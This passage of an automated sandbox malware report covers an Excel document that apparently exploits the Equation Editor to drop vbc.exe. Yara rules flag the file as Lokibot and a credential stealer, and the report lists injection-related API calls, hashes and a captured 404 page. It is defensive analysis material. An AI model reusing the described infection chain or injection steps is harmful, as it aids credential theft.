20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Jun 16, 2021 12:29:51.992002964 CEST	845	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Jun 16, 2021 12:29:51.992021084 CEST	846	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Jun 16, 2021 12:29:51.992053032 CEST	848	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Jun 16, 2021 12:29:51.992069960 CEST	849	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Jun 16, 2021 12:29:51.992090940 CEST	851	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Jun 16, 2021 12:29:51.992120981 CEST	852	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Jun 16, 2021 12:29:51.992136955 CEST	853	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2520 Parent PID: 584

General

Start time:	12:28:49
Start date:	16/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f210000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2724 Parent PID: 584

General

Start time:	12:29:11
Start date:	16/06/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2856 Parent PID: 2724

General

Start time:	12:29:15
Start date:	16/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xd00000
File size:	761856 bytes
MD5 hash:	7146B0D2CAED6422C289A08F63A5C685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 3052 Parent PID: 2856

General

Start time:	12:29:18
Start date:	16/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xd00000
File size:	761856 bytes
MD5 hash:	7146B0D2CAED6422C289A08F63A5C685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2856 Parent PID: 2724 vbc.exeCOMMON

Executed Functions

Function 002EC3D0, Relevance: 3.9, Strings: 3, Instructions: 151COMMON

Download Yara Rule

Strings

tNa, xrefs: 002EC592
tNa, xrefs: 002EC58B
s$J, xrefs: 002EC529

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: s$J$tNa$tNa
API String ID: 0-2008569341
Opcode ID: d66e8dd068cddb63787d9a875d78ad74e9584fb3800b866303eb4c6102fcb610
Instruction ID: d0c1738b3381768718b2b21c7e8ea2507f72d3b94088eb758e86254cdc4a689b
Opcode Fuzzy Hash: d66e8dd068cddb63787d9a875d78ad74e9584fb3800b866303eb4c6102fcb610
Instruction Fuzzy Hash: F8513B70E142598FDB08CFEAC5506AEFBF2FF89300F64C06AD419A7294D7349A528F95

Uniqueness

Uniqueness Score: -1.00%

Function 002EBB78, Relevance: 2.7, Strings: 2, Instructions: 195COMMON

Download Yara Rule

Strings

Df8, xrefs: 002EBC78
Df8, xrefs: 002EBC7F

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: Df8$Df8
API String ID: 0-283531719
Opcode ID: 10f3cb92be9c894f87d9d811f1beba29b40440f83b7dd2d021416a495c55522c
Instruction ID: e4a639e739da0c57bc1004dbd1837186cb7497d388a94ea484cb78f9ebcf637c
Opcode Fuzzy Hash: 10f3cb92be9c894f87d9d811f1beba29b40440f83b7dd2d021416a495c55522c
Instruction Fuzzy Hash: C081C474E142188FDB04CFEAC984AEEFBB2EF89300F24942AD515BB264DB309951CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002EDDA8, Relevance: 1.6, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

<t*L, xrefs: 002EE1EB

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: <t*L
API String ID: 0-3628112154
Opcode ID: f3faed8ca4abf99849d0d9ffb200ba741b4ca66a4f05a1bd733c743fc8de39bc
Instruction ID: 8d4a96e196a2e35fff8de7bc763a669791ade853b7bb0fc3256765dfe6f4df6e
Opcode Fuzzy Hash: f3faed8ca4abf99849d0d9ffb200ba741b4ca66a4f05a1bd733c743fc8de39bc
Instruction Fuzzy Hash: 2ED15D70E2424ADFCB04CFA6C4854AEFBB2FF99300BA49459D416AB254D7349A92CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 00615819, Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a5476f39251d4b1d7b72bc6ecda63a7e0118f34699a346daead73043b767074
Instruction ID: c4c7df2e82429ac48790447d0f6af2f025a73b13fbee08e994024f0c3db62fd8
Opcode Fuzzy Hash: 1a5476f39251d4b1d7b72bc6ecda63a7e0118f34699a346daead73043b767074
Instruction Fuzzy Hash: 7FB12570E05659CFCB44CFA9C9805DEFBF2EFC8315F28856AC406AB254E73499828B55

Uniqueness

Uniqueness Score: -1.00%

Function 002EBA83, Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5343d6889d21ad1d8b1a9ae869f3fb851f16b5744e7621a35a91c4c4ac585660
Instruction ID: 167f7269a29f0774a90530bafdf1a74c304785f86246dec0f82b64076c07bbb9
Opcode Fuzzy Hash: 5343d6889d21ad1d8b1a9ae869f3fb851f16b5744e7621a35a91c4c4ac585660
Instruction Fuzzy Hash: 80B15974E192988FCB05CFA9C8946DEFFB2FF99300F24806AD416AB265D7705941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002EBAD0, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1ac5df7c341a05acc80ee1b1185ed46496707ad731a86ebe2044bb1425b2c0
Instruction ID: 08445248acb7022280011c87a3f427f07511778a7242a9666a3426133278e9cc
Opcode Fuzzy Hash: 4d1ac5df7c341a05acc80ee1b1185ed46496707ad731a86ebe2044bb1425b2c0
Instruction Fuzzy Hash: 14A16BB5E092988FCB05CFA5C8946DEFFB2AF99300F24806ED406AB395EB305945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002E90E1, Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec6af14a9c9b35c6edc959ffdebe8ae20b1577efd8e9a37e1ff69a26f19f0b5
Instruction ID: 25669c20d523f8eec125f150b7629c647c97d0276e9344f4082ca755587eaeb8
Opcode Fuzzy Hash: 5ec6af14a9c9b35c6edc959ffdebe8ae20b1577efd8e9a37e1ff69a26f19f0b5
Instruction Fuzzy Hash: 0D9147B0D50259CFDF14DFA6C8447DEBBF6BF89305FA4806AC508AB245DB7049958F50

Uniqueness

Uniqueness Score: -1.00%

Function 002ECE76, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8cdf7d421b8975ad8e484c9121a7dc0f398610fe8126ef6c2e0d8f5e0ab2b05
Instruction ID: 3ba773af8e94f9c18441d2d4a9c571b5d5f5d758d0d75742e6b832198648bae4
Opcode Fuzzy Hash: e8cdf7d421b8975ad8e484c9121a7dc0f398610fe8126ef6c2e0d8f5e0ab2b05
Instruction Fuzzy Hash: 1721C571E006588BDB18CF9BD8443DEFBF2AFC8300F24C16AD409A6254DB7409558F40

Uniqueness

Uniqueness Score: -1.00%

Function 00617F2E, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006181FF

Strings

vE, xrefs: 00618152
vE, xrefs: 00618347
vE, xrefs: 00618282

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: CreateProcess
String ID: vE$ vE$ vE
API String ID: 963392458-359593119
Opcode ID: 6e1dd2024dc5061f02330d54f2f419197ebddfa3dfa71da46d66b1b49ceb3b60
Instruction ID: 80a77c6d22662d02c423434b7cabe8fd9e4b1dae2a382b10203c740265e82de9
Opcode Fuzzy Hash: 6e1dd2024dc5061f02330d54f2f419197ebddfa3dfa71da46d66b1b49ceb3b60
Instruction Fuzzy Hash: CBC10271D0026D8FDB24CFA4C841BEEBBB2BF49304F1495A9D859B7240DB749A86CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00617F38, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 006181FF

Strings

vE, xrefs: 00618152
vE, xrefs: 00618347
vE, xrefs: 00618282

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: CreateProcess
String ID: vE$ vE$ vE
API String ID: 963392458-359593119
Opcode ID: 2d7eb5b787a72221c176b52d323f3f719549a3bd0ae2ec3a4e699e5558d08335
Instruction ID: 778cd3d1024ce2942b38e1194a3deac7c1b25dc14c2b652d709c4cf026aff22a
Opcode Fuzzy Hash: 2d7eb5b787a72221c176b52d323f3f719549a3bd0ae2ec3a4e699e5558d08335
Instruction Fuzzy Hash: 5BC10271D0022D8FDB24CFA4C841BEDBBB2BF49304F1495A9D859B7240DB749A86CF95

Uniqueness

Uniqueness Score: -1.00%

Function 006171D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0061725E

Strings

iF, xrefs: 006171D8

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: ResumeThread
String ID: iF
API String ID: 947044025-1784227508
Opcode ID: 8383d840406d4c945f1eddff493923414048b4c773f31d746ca10ef2502fa21d
Instruction ID: 740c1b246b2039e89617f6d69fa543f0c6cdb3378d208f2dba89d06a72f2f928
Opcode Fuzzy Hash: 8383d840406d4c945f1eddff493923414048b4c773f31d746ca10ef2502fa21d
Instruction Fuzzy Hash: AF31EAB4D012199FCF10CFA9D880AEEFBB1BB49314F24842AE815B7300D775A946CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002E0978, Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

@2Bm, xrefs: 002E0A1E
-, xrefs: 002E0BB8

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: -$@2Bm
API String ID: 0-2417303663
Opcode ID: 4b5b6d7a688a136093e1c2f56eca66e727e20136a05ebc9b1a94df9893a6b43b
Instruction ID: 7c25750296e3c1e39ca51ab1179d5da3e3bb580fdf560d8385f1308e3dcf683d
Opcode Fuzzy Hash: 4b5b6d7a688a136093e1c2f56eca66e727e20136a05ebc9b1a94df9893a6b43b
Instruction Fuzzy Hash: 9F61F334B502548FD704CF69C494BAEB3B6AF88318F294479D506EB351DFB09C82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00617BA0, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00617C73

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 11afd463f07e61bc7659b128150f54dcb2fe73776be2494414790596e767a5c4
Instruction ID: 26f0f0e769076bf3e9b3bf996d0b38be48d0cb1641ef056067cf875571370821
Opcode Fuzzy Hash: 11afd463f07e61bc7659b128150f54dcb2fe73776be2494414790596e767a5c4
Instruction Fuzzy Hash: 7241ACB4D012589FCF00CFA9D984AEEFBF1BB49304F24942AE815B7200D774AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00617D00, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00617DB2

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e2f40660e2e2efb4429b2542c81904404868cef19ffa29e3fbdc37ab2145c01b
Instruction ID: b82c72f83b6ed3ccbc75a7bf42d296502cccd47d2548af4c66688150f5dda2dc
Opcode Fuzzy Hash: e2f40660e2e2efb4429b2542c81904404868cef19ffa29e3fbdc37ab2145c01b
Instruction Fuzzy Hash: B641B8B8D002589FCF00CFA9D880AEEFBB1BF09310F24942AE815B7200D775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00617A78, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00617B22

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: adee5c3beaa07805802d574b0f7a28af0f91b3bc1386dc1a05c3d775dd11f91f
Instruction ID: ed5fafb17191149e52c215d079b93e029443d0bdcc1db97e1845d52328f448ef
Opcode Fuzzy Hash: adee5c3beaa07805802d574b0f7a28af0f91b3bc1386dc1a05c3d775dd11f91f
Instruction Fuzzy Hash: 384199B8D042589FCF10CFA9D880AEEFBB5BB49314F14A42AE815B7300D775A941CF55

Uniqueness

Uniqueness Score: -1.00%

Function 006172C8, Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0061737F

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 196ede5fd2f20a7836945e4fcd77cd18bf58d44b461fda50ff6eb9382c3e31f3
Instruction ID: a4b195adc291a8f6d48262fde718c042152206ea04e3270d8df0e0645104640e
Opcode Fuzzy Hash: 196ede5fd2f20a7836945e4fcd77cd18bf58d44b461fda50ff6eb9382c3e31f3
Instruction Fuzzy Hash: 0D41EEB4D002589FCF10CFA9D884AEEFBB1BF48314F24842AE819B7240D778A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006172D0, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0061737F

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7f19863a3963657da2ed5f39f0d40c53f69e4b250e1c5ee237b41ec6234c4fda
Instruction ID: e5a612bbbf65a569f786a1f6854b4c104080ac2474105af1890d88a28cd7e7ba
Opcode Fuzzy Hash: 7f19863a3963657da2ed5f39f0d40c53f69e4b250e1c5ee237b41ec6234c4fda
Instruction Fuzzy Hash: 9A41CDB4D002189FCB10CFA9D884AEEFBF1BF48314F24842AE819B7240D778A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00613A88, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00613B2F

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cd5b57ebc6707cddc195fa021a61fa535ccbd951fa4065a39d2c0555516693ce
Instruction ID: 35d65c4ee4834a56acfb69ce892f0531d0f758ed9a6c9927272f0a883538370d
Opcode Fuzzy Hash: cd5b57ebc6707cddc195fa021a61fa535ccbd951fa4065a39d2c0555516693ce
Instruction Fuzzy Hash: 4C3188B9D042589FCF10CFA9D884AEEFBB5BB19310F24942AE815B7310D375AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 006171E0, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0061725E

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 35d015002aa2fd1731e9a2b95afe3ed240783c2c2d35357a51b8d2f4aed43b64
Instruction ID: f89f095cae951d1b118acd9db84eb070d69f5906d3d219967e656d1d64ed9b2d
Opcode Fuzzy Hash: 35d015002aa2fd1731e9a2b95afe3ed240783c2c2d35357a51b8d2f4aed43b64
Instruction Fuzzy Hash: E131B9B4D012199FCF14CFA9D884AEEFBB5BB49314F24942AE815B7300D775A942CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002EC73A, Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

BIZ*, xrefs: 002EC7BF

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: BIZ*
API String ID: 0-4110255597
Opcode ID: 6ed38e51fde52b551d3a3cbb7b3ed5e0fd90483f5b3e7ebd62a7b8e826e035f0
Instruction ID: 057b3338c23ec91e3d0548d7276f27f23a9ece4c52766b8d3fc8ba3a88644017
Opcode Fuzzy Hash: 6ed38e51fde52b551d3a3cbb7b3ed5e0fd90483f5b3e7ebd62a7b8e826e035f0
Instruction Fuzzy Hash: C9314E74E18259DFCB44CFEAC5809AEFBF2BF89300F20C4AAC414AB215D3749A518F51

Uniqueness

Uniqueness Score: -1.00%

Function 002EB091, Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

(2-, xrefs: 002EB0A6

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: (2-
API String ID: 0-1638975054
Opcode ID: 00d41db4452f97e75f6af3f438bed94d76c249f5c9c490d68bac8213c605bcbd
Instruction ID: a4fa26c820729fc197426a724a49988748d9c656f1a22ecdc4340350f3bed110
Opcode Fuzzy Hash: 00d41db4452f97e75f6af3f438bed94d76c249f5c9c490d68bac8213c605bcbd
Instruction Fuzzy Hash: 16F03730E14268CFDB16CFA6D880A9EB7B3AB98300F10C56AD016A7364EB34AD108F50

Uniqueness

Uniqueness Score: -1.00%

Function 002E2A00, Relevance: .2, Instructions: 204COMMON

Download Yara Rule

